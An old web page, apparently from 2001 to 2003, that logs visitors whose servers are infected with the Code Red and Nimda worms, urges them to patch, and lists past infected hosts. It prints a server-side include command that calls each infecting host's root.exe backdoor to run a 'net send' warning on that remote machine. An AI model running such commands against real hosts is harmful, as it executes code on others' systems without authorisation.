Code Red Attacks ?!


Hm it is time to protect your webserver with either the patch or install a real OS and WEB server
Please think of the others !



Local system date
Browser you are using
IP number you use
Origin
Hits before you



Last few code red users :




Last few nimda infected users :


Now we could execute :
<--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22"-->

On the above mentioned servers....oeps.....

Old list from upto 28 Sept 2001
Old list from upto 01 June 2002
Old list from upto 01 july 2003